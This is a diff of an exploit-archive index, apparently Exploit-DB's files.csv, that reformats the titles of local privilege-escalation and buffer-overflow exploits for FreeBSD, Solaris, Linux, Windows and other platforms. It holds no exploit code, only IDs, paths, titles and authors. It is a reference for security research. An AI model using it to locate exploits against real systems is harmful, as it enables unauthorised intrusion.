+14002,platforms/freebsd/local/14002.c,"FreeBSD - 'nfs_mount()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0 14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0 14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0 14046,platforms/windows/local/14046.py,"FieldNotes 32 5.0 - Buffer Overflow (SEH)",2010-06-25,TecR0c,windows,local,0 @@ -7054,7 +7055,7 @@ id,file,description,date,author,platform,type,port 16098,platforms/android/local/16098.c,"Android 1.x/2.x HTC Wildfire - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0 16099,platforms/android/local/16099.c,"Google Android 1.x/2.x - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0 16107,platforms/windows/local/16107.py,"AOL Desktop 9.6 - '.rtx' Buffer Overflow",2011-02-03,sickness,windows,local,0 -16119,platforms/freebsd/local/16119.c,"FreeBSD 5.4-RELEASE ftpd 6.00LS - sendfile kernel mem-leak Exploit",2011-02-06,kingcope,freebsd,local,0 +16119,platforms/freebsd/local/16119.c,"FreeBSD 5.4-RELEASE ftpd 6.00LS - 'sendfile' Memory Leak Exploit",2011-02-06,kingcope,freebsd,local,0 16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 16133,platforms/windows/local/16133.htm,"AoA Mp4 Converter 4.1.0 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 16138,platforms/windows/local/16138.c,"DESlock+ < 4.1.10 - 'vdlptokn.sys' Local Kernel Ring0 SYSTEM Exploit",2011-02-09,mu-b,windows,local,0 @@ -7334,7 +7335,7 @@ id,file,description,date,author,platform,type,port 19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - Missing /etc/group Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0 19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0 19126,platforms/solaris/local/19126.txt,"Sun Solaris 2.6 power management - Exploit",1998-07-16,"Ralf Lehmann",solaris,local,0 -19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 sdtcm_convert - Exploit",1998-10-23,UNYUN,solaris,local,0 +19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 - 'sdtcm_convert' Exploit",1998-10-23,UNYUN,solaris,local,0 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",multiple,local,0 19142,platforms/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",linux,local,0 @@ -7358,10 +7359,10 @@ id,file,description,date,author,platform,type,port 19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking 'Save Password'",1998-03-19,"Martin Dolphin",windows,local,0 19198,platforms/windows/local/19198.txt,"Microsoft Windows NT 4.0 SP4 - Known DLL Cache",1999-02-18,L0pht,windows,local,0 19199,platforms/solaris/local/19199.c,"Solaris 2.5.1 automount - Exploit",1997-11-26,anonymous,solaris,local,0 -19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (1)",1997-08-25,bloodmask,unix,local,0 -19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (2)",1997-08-25,jGgM,unix,local,0 -19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (3)",1997-08-25,jGgM,unix,local,0 -19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin Exploit",1996-12-04,"Roger Espel Llima",unix,local,0 +19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (1)",1997-08-25,bloodmask,unix,local,0 +19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (2)",1997-08-25,jGgM,unix,local,0 +19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (3)",1997-08-25,jGgM,unix,local,0 +19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Exploit",1996-12-04,"Roger Espel Llima",unix,local,0 19205,platforms/solaris/local/19205.c,"Sun Solaris 7.0 dtprintinfo - Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0 19206,platforms/solaris/local/19206.c,"Sun Solaris 7.0 lpset - Buffer Overflow",1999-05-11,"kim yong-jun",solaris,local,0 19209,platforms/windows/local/19209.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - Help File Buffer Overflow",1999-05-17,"David Litchfield",windows,local,0 @@ -7391,7 +7392,7 @@ id,file,description,date,author,platform,type,port 19258,platforms/solaris/local/19258.sh,"Sun Solaris 7.0 ff.core - Exploit",1999-01-07,"John McDonald",solaris,local,0 19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc - Exploit",1999-02-03,xnec,linux,local,0 19260,platforms/irix/local/19260.sh,"SGI IRIX 6.2 - '/usr/lib/netaddpr' Exploit",1997-05-09,"Jaechul Choe",irix,local,0 -19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 at(1) - Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0 +19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0 19262,platforms/irix/local/19262.txt,"SGI IRIX 6.2 cdplayer - Exploit",1996-11-21,"Yuri Volobuev",irix,local,0 19267,platforms/irix/local/19267.c,"SGI IRIX 6.3 - xrm Buffer Overflow",1997-05-27,"David Hedley",irix,local,0 19268,platforms/irix/local/19268.txt,"SGI IRIX 5.3 Cadmin - Exploit",1996-08-06,"Grant Kaufmann",irix,local,0 @@ -7454,8 +7455,8 @@ id,file,description,date,author,platform,type,port 19384,platforms/linux/local/19384.c,"Debian 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",linux,local,0 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x/5.0 - Buffer Overflow",1999-06-25,KSR[T],linux,local,0 19371,platforms/linux/local/19371.c,"VMware 1.0.1 - Buffer Overflow",1999-06-25,funkysh,linux,local,0 -19373,platforms/linux/local/19373.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - Lsof Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0 -19374,platforms/linux/local/19374.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - Lsof Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0 +19373,platforms/linux/local/19373.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0 +19374,platforms/linux/local/19374.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0 19376,platforms/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 - ISAPI GetExtensionVersion()",1999-03-08,"Fabien Royer",windows,local,0 19417,platforms/osx/local/19417.txt,"Apple Mac OS 8 8.6 - Weak Password Encryption",1999-07-10,"Dawid adix Adamski",osx,local,0 19418,platforms/aix/local/19418.txt,"IBM AIX 4.3.1 adb - Exploit",1999-07-12,"GZ Apple",aix,local,0 @@ -7510,13 +7511,13 @@ id,file,description,date,author,platform,type,port 19535,platforms/hp-ux/local/19535.pl,"HP-UX 10.20 newgrp - Exploit",1996-12-01,SOD,hp-ux,local,0 19542,platforms/sco/local/19542.txt,"SCO Open Server 5.0.5 - 'userOsa' Symlink Exploit",1999-10-11,"Brock Tellier",sco,local,0 19543,platforms/sco/local/19543.c,"SCO Open Server 5.0.5 - cancel Buffer Overflow",1999-10-08,"Brock Tellier",sco,local,0 -19544,platforms/linux/local/19544.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (1)",1996-10-25,"Vadim Kolontsov",linux,local,0 -19545,platforms/bsd/local/19545.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (2)",1996-10-25,"Vadim Kolontsov",bsd,local,0 +19544,platforms/linux/local/19544.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (1)",1996-10-25,"Vadim Kolontsov",linux,local,0 +19545,platforms/bsd/local/19545.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (2)",1996-10-25,"Vadim Kolontsov",bsd,local,0 19546,platforms/multiple/local/19546.pl,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 SUIDPerl - Overflow Exploit (1)",1997-04-17,"Pavel Kankovsky",multiple,local,0 19547,platforms/multiple/local/19547.txt,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 SUIDPerl - Overflow Exploit (2)",1997-04-17,"Willy Tarreau",multiple,local,0 19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0 19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (2)",1997-02-13,"Solar Designer",multiple,local,0 -19556,platforms/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon",1996-11-16,"Leshka Zakharoff",multiple,local,0 +19556,platforms/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon Exploit",1996-11-16,"Leshka Zakharoff",multiple,local,0 19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 - cwdtools Exploit",1999-10-22,"Brock Tellier",linux,local,0 19673,platforms/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 - Help File Trojan",1999-12-10,"Pauli Ojanpera",windows,local,0 19674,platforms/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - Privileged Program Debugging",1999-12-10,"Brock Tellier",sco,local,0 @@ -7535,11 +7536,11 @@ id,file,description,date,author,platform,type,port 19643,platforms/sco/local/19643.c,"SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 - su(1) Buffer Overflow",1999-10-30,K2,sco,local,0 19647,platforms/solaris/local/19647.c,"Solaris 7.0 kcms_configure - Exploit",1999-11-30,UNYUN,solaris,local,0 19648,platforms/solaris/local/19648.c,"Solaris 7.0 - CDE dtmail/mailtool Buffer Overflow",1999-11-30,UNYUN,solaris,local,0 -19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 gdc - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 -19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 gdc - Symlink Exploit",1999-12-01,"Brock Tellier",freebsd,local,0 -19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon setgid dialer",1999-12-01,"Brock Tellier",freebsd,local,0 -19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 xmindpath - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 -19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 angband - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 +19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 - 'gdc' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 +19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 - 'gdc' Symlink Exploit",1999-12-01,"Brock Tellier",freebsd,local,0 +19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon setgid Dialer",1999-12-01,"Brock Tellier",freebsd,local,0 +19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 - 'xmindpath' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 +19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 - 'angband' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 40430,platforms/windows/local/40430.cs,"Microsoft Windows - RegLoadAppKey Hive Enumeration Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0 19654,platforms/sco/local/19654.pl,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin' Exploit",1998-12-02,"Brock Tellier",sco,local,0 19655,platforms/linux/local/19655.txt,"RSA Security RSAREF 2.0 - Buffer Overflow",1999-12-14,"Alberto Solino",linux,local,0 @@ -7575,7 +7576,7 @@ id,file,description,date,author,platform,type,port 19739,platforms/windows/local/19739.txt,"Microsoft Windows NT 4.0 - Recycle Bin Pre-created Folder",2000-02-01,"Arne Vidstron and Nobuo Miwa",windows,local,0 19752,platforms/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink Exploit",2000-02-15,"Shawn Bracken",sco,local,0 19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - autorun.inf Exploit",2000-02-18,"Eric Stevens",windows,local,0 -19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu - Exploit",2000-02-19,anonymous,freebsd,local,0 +19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu' Exploit",2000-02-19,anonymous,freebsd,local,0 19757,platforms/solaris/local/19757.txt,"Sun Workshop 5.0 - Licensing Manager Symlink Exploit",2000-02-21,sp00n,solaris,local,0 19762,platforms/linux/local/19762.c,"FTPx FTP Explorer 1.0.00.10 - Weak Password Encryption",2000-02-25,"Nelson Brito",linux,local,0 19763,platforms/linux/local/19763.txt,"RedHat Linux 6.0 - Single User Mode Authentication",2000-02-23,"Darren Reed",linux,local,0 @@ -7640,8 +7641,8 @@ id,file,description,date,author,platform,type,port 19981,platforms/linux/local/19981.sh,"KDE 1.1.2 KApplication configfile - Exploit (3)",2000-05-31,IhaQueR,linux,local,0 19989,platforms/windows/local/19989.c,"PassWD 1.2 - Weak Encryption",2000-06-04,"Daniel Roethlisberger",windows,local,0 19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 - man '/tmp' Symlink Exploit",2000-06-02,"Jason Axley",hp-ux,local,0 -19991,platforms/linux/local/19991.c,"BSD mailx 8.1.1-10 - Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",linux,local,0 -19992,platforms/linux/local/19992.c,"BSD mailx 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0 +19991,platforms/linux/local/19991.c,"BSD 'mailx' 8.1.1-10 - Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",linux,local,0 +19992,platforms/linux/local/19992.c,"BSD 'mailx' 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0 19993,platforms/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",windows,local,0 19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 - BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local,0 20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Sendmail Capabilities Privilege Escalation(1)",2000-06-07,"Florian Heinz",linux,local,0 @@ -7705,7 +7706,7 @@ id,file,description,date,author,platform,type,port 20250,platforms/linux/local/20250.c,"LBL Traceroute 1.4 a5 - Heap Corruption (1)",2000-09-28,Dvorak,linux,local,0 20251,platforms/linux/local/20251.c,"LBL Traceroute 1.4 a5 - Heap Corruption (2)",2000-09-28,"Perry Harrington",linux,local,0 20252,platforms/linux/local/20252.c,"LBL Traceroute 1.4 a5 - Heap Corruption (3)",2000-09-28,"Michel Kaempf",linux,local,0 -20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x - fstat Format String",2000-10-04,K2,openbsd,local,0 +20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x - 'fstat' Format String",2000-10-04,K2,openbsd,local,0 20257,platforms/windows/local/20257.txt,"Microsoft Windows NT 4.0/2000 Predictable LPC Message Identifier - Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",windows,local,0 20543,platforms/windows/local/20543.rb,"Microsoft Windows - Service Trusted Path Privilege Escalation (Metasploit)",2012-08-15,Metasploit,windows,local,0 20262,platforms/windows/local/20262.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (2)",2012-08-05,pole,windows,local,0 @@ -7721,7 +7722,7 @@ id,file,description,date,author,platform,type,port 20296,platforms/windows/local/20296.rb,"CoolPlayer+ Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (Large Shellcode)",2012-08-06,"Robert Larsen",windows,local,0 40428,platforms/windows/local/40428.txt,"Macro Expert 4.0 - Multiple Privilege Escalations",2016-09-26,Tulpa,windows,local,0 20312,platforms/linux/local/20312.c,"Oracle Internet Directory 2.0.6 - oidldap Exploit",2000-10-18,"Juan Manuel Pascual Escribá",linux,local,0 -20316,platforms/linux/local/20316.txt,"BSD lpr 0.54 -4 - Arbitrary Command Execution",2000-10-20,"zenith parsec",linux,local,0 +20316,platforms/linux/local/20316.txt,"BSD 'lpr' 0.54 -4 - Arbitrary Command Execution",2000-10-20,"zenith parsec",linux,local,0 20317,platforms/windows/local/20317.c,"Microsoft Windows NT 4.0 - MSIEXEC Registry Permissions",2000-10-23,Mnemonix,windows,local,0 20326,platforms/unix/local/20326.sh,"ntop 1.x - i Local Format String",2000-10-18,"Paul Starzetz",unix,local,0 20329,platforms/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 - crontab '/tmp' File Exploit",2000-10-20,"Kyong-won Cho",hp-ux,local,0 @@ -7729,7 +7730,7 @@ id,file,description,date,author,platform,type,port 20338,platforms/linux/local/20338.c,"Samba 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local,0 20339,platforms/linux/local/20339.sh,"Samba 2.0.7 - SWAT Symlink (2)",2000-11-01,Optyx,linux,local,0 20341,platforms/linux/local/20341.sh,"Samba 2.0.7 - SWAT Logfile Permissions",2000-11-01,miah,linux,local,0 -20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x /usr/bin/top - Format String",2000-11-01,truefinder,freebsd,local,0 +20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x - '/usr/bin/top' Format String",2000-11-01,truefinder,freebsd,local,0 20378,platforms/linux/local/20378.pl,"Debian top - Format String",2004-12-12,"Kevin Finisterre",linux,local,0 20380,platforms/unix/local/20380.c,"ManTrap 1.6.1 - Hidden Process Disclosure",2000-11-01,f8labs,unix,local,0 20381,platforms/unix/local/20381.c,"ManTrap 1.6.1 - Root Directory Inode Disclosure",2000-11-01,f8labs,unix,local,0 @@ -7935,7 +7936,7 @@ id,file,description,date,author,platform,type,port 21373,platforms/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Compromise",2002-04-11,"Przemyslaw Frasunek",openbsd,local,0 21375,platforms/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilities",2002-04-11,"Paul Starzetz",linux,local,0 21398,platforms/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escaping Command Execution",2002-04-18,A.Dimitrov,linux,local,0 -21407,platforms/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0 +21407,platforms/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - 'exec C Library' Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0 21408,platforms/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,unix,local,0 21414,platforms/unix/local/21414.c,"GNU Screen 3.9.x Braille Module - Buffer Overflow",2002-04-23,"Gobbles Security",unix,local,0 21420,platforms/linux/local/21420.c,"Sudo 1.6.x - Password Prompt Heap Overflow",2001-11-01,MaXX,linux,local,0 @@ -8059,8 +8060,8 @@ id,file,description,date,author,platform,type,port 22248,platforms/hp-ux/local/22248.sh,"HP-UX 10.x - rs.F3000 Unspecified Unauthorized Access",2003-02-12,"Last Stage of Delirium",hp-ux,local,0 22265,platforms/linux/local/22265.pl,"cPanel 5.0 - 'Openwebmail' Privilege Escalation",2003-02-19,deadbeat,linux,local,0 22272,platforms/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",multiple,local,0 -22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0 -22331,platforms/unix/local/22331.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",unix,local,0 +22332,platforms/unix/local/22332.c,"BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0 +22331,platforms/unix/local/22331.c,"BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",unix,local,0 22320,platforms/linux/local/22320.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (1)",2003-03-03,"dcryptr && tarranta",linux,local,0 22321,platforms/linux/local/22321.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (2)",2003-03-03,"Guilecool & deka",linux,local,0 22322,platforms/linux/local/22322.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (3)",2003-03-03,omega,linux,local,0 @@ -8216,7 +8217,7 @@ id,file,description,date,author,platform,type,port 23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0 23611,platforms/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",multiple,local,0 23634,platforms/linux/local/23634.c,"0verkill 0.16 - Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,linux,local,0 -23655,platforms/bsd/local/23655.txt,"BSD Kernel - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0 +23655,platforms/bsd/local/23655.txt,"BSD - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0 23658,platforms/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout",2004-02-06,"Markus Mueller",linux,local,0 23674,platforms/linux/local/23674.txt,"(Linux Kernel 2.6) Samba 2.2.8 (Debian / Mandrake) - Share Privilege Escalation",2004-02-09,"Martin Fiala",linux,local,0 23682,platforms/linux/local/23682.c,"XFree86 4.3 - Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local,0 @@ -8318,7 +8319,7 @@ id,file,description,date,author,platform,type,port 25419,platforms/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH)",2013-05-13,seaofglass,windows,local,0 25444,platforms/linux/local/25444.c,"Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Privilege Escalation (1)",2013-05-14,sd,linux,local,0 25448,platforms/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,windows,local,0 -25450,platforms/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0 +25450,platforms/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0 25554,platforms/windows/local/25554.c,"Altiris Client 6.0.88 - Service Privilege Escalation",2005-04-27,"Reed Arvin",windows,local,0 40394,platforms/linux/local/40394.rb,"Docker Daemon - Privilege Escalation (Metasploit)",2016-09-19,Metasploit,linux,local,0 25607,platforms/windows/local/25607.py,"Ophcrack 3.5.0 - Code Execution Local Buffer Overflow",2013-05-21,xis_one,windows,local,0 @@ -8352,7 +8353,7 @@ id,file,description,date,author,platform,type,port 26352,platforms/php/local/26352.php,"PHP 5.0.5 - Safedir Restriction Bypass Vulnerabilities",2005-10-17,anonymous,php,local,0 26353,platforms/linux/local/26353.txt,"Linux Kernel 2.6 - Console Keymap Local Command Injection (PoC)",2005-10-17,"Rudolf Polzer",linux,local,0 26367,platforms/windows/local/26367.py,"Adrenalin Player 2.2.5.3 - '.asx' Buffer Overflow (SEH)",2013-06-21,Onying,windows,local,0 -26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0 < 9.1 mmap/ptrace - Privilege Escalation",2013-06-21,Hunger,freebsd,local,0 +26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Privilege Escalation",2013-06-21,Hunger,freebsd,local,0 26402,platforms/windows/local/26402.py,"Mediacoder (.lst) - Buffer Overflow (SEH)",2013-06-24,metacom,windows,local,0 26403,platforms/windows/local/26403.py,"Mediacoder - '.m3u' Buffer Overflow (SEH)",2013-06-24,metacom,windows,local,0 26404,platforms/windows/local/26404.py,"Mediacoder PMP Edition 0.8.17 - '.m3u' Buffer Overflow",2013-06-24,metacom,windows,local,0 @@ -8379,7 +8380,7 @@ id,file,description,date,author,platform,type,port 26753,platforms/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,unix,local,0 26805,platforms/windows/local/26805.rb,"Corel PDF Fusion - Stack Buffer Overflow (Metasploit)",2013-07-13,Metasploit,windows,local,0 26889,platforms/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct RET)",2013-07-16,PuN1sh3r,windows,local,0 -40385,platforms/netbsd_x86/local/40385.rb,"NetBSD mail.local(8) - Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0 +40385,platforms/netbsd_x86/local/40385.rb,"NetBSD - 'mail.local(8)' Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0 26950,platforms/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Kernel Mode Privilege Escalation",2013-07-18,MJ0011,windows,local,0 26970,platforms/windows/local/26970.c,"McAfee VirusScan 8.0 - Path Specification Privilege Escalation",2005-12-22,"Reed Arvin",windows,local,0 